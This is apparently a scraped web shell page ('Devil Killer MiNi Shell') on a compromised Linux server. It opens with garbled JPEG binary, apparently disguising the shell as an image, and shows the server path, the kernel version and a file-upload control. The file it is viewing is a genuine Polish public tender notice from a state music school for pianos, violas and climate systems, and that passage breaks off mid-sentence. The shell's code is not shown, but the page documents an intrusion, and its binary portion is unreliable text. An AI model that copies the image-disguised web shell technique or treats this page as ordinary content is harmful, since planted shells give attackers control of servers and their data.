JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251117/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251117/0053736301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa fortepianu koncertowego (1 szt.), dostawa pianin klasycznych (5 szt.), dostawa altówek uczniowskich (4 szt.), dostawa automatycznych systemów klimatycznych, wraz z dodatkowym wyposażeniem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWA SZKOŁA MUZYCZNA I ST. NR 1 W KĘDZIERZYNIE-KOŹLU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000282607</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 40</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-224</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774723395</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@psm1kedzierzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/psmkedzierzyn</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa fortepianu koncertowego (1 szt.), dostawa pianin klasycznych (5 szt.), dostawa altówek uczniowskich (4 szt.), dostawa automatycznych systemów klimatycznych, wraz z dodatkowym wyposażeniem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b228319-f45c-4ef7-8a15-5c32cba76555</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00537363</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00534205/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa fortepianu koncertowego (1 szt.), dostawa pianin klasycznych (5 szt.), dostawa altówek uczniowskich (4 szt.), dostawa automatycznych systemów klimatycznych, wraz z dodatkowym wyposażeniem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2b228319-f45c-4ef7-8a15-5c32cba76555 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-2b228319-f45c-4ef7-8a15-5c32cba76555</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych<br/>przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie<br/>ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych”.<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf;<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>3) Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym<br/>6) Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie<br/>z dokumentem podpisywanym.<br/>7) Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym<br/>i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8) Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.<br/>7. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na platformie za pośrednictwem e-Zamówienia pod adresem:<br/>https://ezamowienia.gov.pl/pl/, nie za pośrednictwem adresu email.<br/>9) Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>10) Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>11) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>12) Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-2b228319-f45c-4ef7-8a15-5c32cba76555</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia <br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie <br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) <br/>(Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: <br/>1) administratorem Pani/Pana danych osobowych jest Dyrektor Pańśtwowej Szkoły Muzycznej nr1 <br/>w Kędzierzynie-Koźlu; <br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem <br/>e-mail: j.poplucz@psm1kedzierzyn.pl <br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym <br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie <br/>podstawowym bez negocjacji. <br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P. <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia <br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres <br/>przechowywania obejmuje cały czas trwania umowy; <br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest <br/>wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w <br/>postępowaniu o udzielenie zamówienia publicznego. <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosownie do art. 22 RODO. <br/>8) posiada Pani/Pan: <br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących <br/>przedmiotowego postępowania; <br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych; <br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych <br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub <br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że <br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9) nie przysługuje Pani/Panu: <br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO <br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla <br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.26.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Fortepian koncertowy klasy mistrzowskiej – 1 szt.: wykonany w technologii tradycyjnej zgodnie z <br/>właściwymi procedurami, przy użyciu wyselekcjonowanych materiałów najwyższej możliwej jakości, w <br/>większości prac wykonany ręcznie, z najwyższej klasy czułością i wrażliwością mechanizmu i wyjątkowych <br/>walorach brzmieniowych. Instrument powinien posiadać odpowiednie walory wykonawcze, prezentować <br/>uniwersalizm brzmieniowy pozwalający na wykonywanie zarówno muzyki solowej jak i muzyki kameralnej <br/>w różnych obsadach: a) posiadać intonację pozwalającą na uzyskanie optymalnie homogenicznego brzmienia zespołów kameralnych, b) prezentować wyrównane proporcje brzmieniowe partii basowej i dyszkantowej, <br/>c) posiadać szeroką paletę barwową każdego rejestru; <br/>Pianino klasyczne nr 1 wysokie – 1 szt.: urządzenie pedałowe 3 pedały: prawy pedał forte, lewy pedał piano, <br/>środkowy pedał moderator, rama żeliwna żeliwo szare, odlewane, piaskowana i lakierowana. Strojnica <br/>wykonana z twardej sklejki klonowej; płyta rezonansowa wykonana z litego świerku rezonansowego <br/>europejskiego, naciąg Struny wiolinowe okrągłe, struny basowe rdzeń okrągły, nawój: drut z czystej miedzi; <br/>Kołki stroikowe wykonane ze stali, niklowane; <br/>Pianino klasyczne nr 2 wysokie – 2 szt.: urządzenie pedałowe -3 pedały: prawy pedał forte, lewy pedał piano, <br/>środkowy pedał moderator. Dźwięczenia: szkielet wykonany z wysokiej jakości drewna, rama żeliwna: żeliwo <br/>szare, odlewane, piaskowana i lakierowana rama żeliwna połączona ze szkieletem minimum dwoma sztycami, <br/>układ ramy żeliwnej krzyżowy z zamkniętym polem kołków stroikowych, strojnica - wykonana z twardej <br/>sklejki klonowej, płyta rezonansowa: wykonana z litego świerku rezonansowego, Naciąg: struny wiolinowe <br/>okrągłe, struny basowe rdzeń okrągły, nawój: drut z czystej miedzi, struny basowe nawijane posiadają eske <br/>fortepianowa. W partii basowej tzw. martwe części strun nie są wytłumione, kołki stroikowe wykonane ze stali <br/>– nie niklowane, ilość zwojów strun na kołkach stroikowych – 3; <br/>Pianino klasyczne nr 3 niskie – 2 szt.: urządzenie pedałowe - 3 pedały: prawy pedał forte, lewy pedał piano, <br/>środkowy pedał moderator, Dźwięczenia: rama żeliwna Żeliwo szare, odlewane, piaskowana i lakierowana; <br/>Strojnica wykonana z twardej sklejki klonowej lub bukowej, płyta rezonansowa wykonana ze sklejki z <br/>fornirowaną powierzchnią (świerk rezonansowy), mostek basowy wykonany z klonu, próg wiolinowy <br/>wykonany z klonu, nakładka progu wiolinowego wykonana z buku lub klonu, mostek basowy i próg wiolinowy <br/>grafitowany, sztyfty na mostku basowym i progu wiolinowym półokrągłe, Naciąg struny wiolinowe okrągłe, <br/>struny basowe rdzeń okrągły, nawój miedź. Struny basowe nawijane posiadają eske fortepianową, kołki <br/>stroikowe wykonane ze stali; <br/>Automatyczny system klimatyczny do posiadanego na stanie fortepianu YAMAHA C3X wraz z montażem <br/>tego sytemu – 1 kpl.; <br/>Automatyczny system klimatyczny do posiadanego na stanie fortepianu YAMAHA GB1 wraz z montażem <br/>– 1 kpl.; <br/>Ława hydrauliczna do fortepianów/pianin posiadanych na stanie oraz jednego nowego - 7 szt. <br/>Ława do pianina (5.nowych i 2.posiadanych na stanie) - 7 szt. <br/>Altówka uczniowska 13” - 2 szt. <br/>Altówka uczniowska 14” - 2 szt. <br/>Szczegółowy opis ww. przedmiotu zamówienia (tj.wymagane parametry <br/>techniczne) stanowią Załącznik nr 7 OPZ-specyfikacja techniczna - wymagane <br/>parametry techniczne, Projektowane postanowienia umowy (PPU), <br/>SWZ – zamieszczone wraz z załącznikami w wersji elektronicznej na stronie <br/>internetowej prowadzonego postępowania stanowiące integralną częścią SWZ. <br/>Oferowane przez Wykonawcę instrumenty wraz z wyposażeniem muszą w całości spełniać wymagane parametry techniczne określone ściśle w OPZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37311000-1 - Instrumenty klawiszowe</p> <p class="mb-0">37321600-0 - Pokrowce lub futerały na instrumenty muzyczne lub akcesoria</p> <p class="mb-0">98396000-5 - Usługi strojenia instrumentów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość oferowanych instrumentów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji na instrumenty muzyczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa: <br/> <br/>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie <br/>co najmniej: <br/>a) dwie dostawy (umowy/zamówienia) fortepianów – każdy fortepian o wartości <br/>co najmniej 400 000,00 zł. brutto, <br/>oraz: <br/>b) pięć dostaw (umów/zamówień) pianin – każde pianino o wartości co najmniej <br/>20 000,00 zł. brutto. <br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>spełnianie warunku Wykonawcy wykazują łącznie - Zamawiający nie formułuje w tym zakresie <br/>szczególnego sposobu spełnienia warunku o którym mowa w art. 117 ust. 1 ustawy, tym samym <br/>dopuszcza możliwość wykazywania jednej dostawy przez jednego z wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia, a drugiej przez inny podmiot, wykonawcę. <br/>Uwaga: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych <br/>wspólnie z innymi wykonawcami, należy wykazać dostawę (zakres), w której Wykonawca <br/>bezpośrednio uczestniczył. Do przeliczenia wszystkich wartości finansowych, a występujących w <br/>innych walutach niż PLN Wykonawca zastosuje średni kurs Narodowego Banku Polskiego (NBP) <br/>opublikowany w dniu ukazania się ogłoszenia o niniejszym zamówieniu na stronie internetowej <br/>prowadzonego postepowania. Średnie kursy walut dostępne są na stronie internetowej Narodowego Banku Polskiego pod następującym adresem: http://www.nbp.pl/. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie potwierdzenia warunków udziału w postępowaniu: <br/>1) wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również <br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz <br/>których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów <br/>określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym <br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na <br/>rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub <br/>ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie <br/>uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających <br/>się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich <br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – w zakresie <br/>niezbędnym do wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi załącznik nr 4 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca w ramach przedmiotowych środków dowodowych zobowiązany jest do dnia składania <br/>ofert dostarczyć Zamawiającemu na adres: Państwowa Szkoła Muzyczna I stopnia nr 1 <br/>w Kędzierzynie-Koźlu, ul. T. Kościuszki 40, 47-224 Kędzierzyn-Koźle, oferowane instrumenty <br/>w postaci modeli fizycznych fortepianu, pianin, altówek, które będą podlegały ocenie pod względem 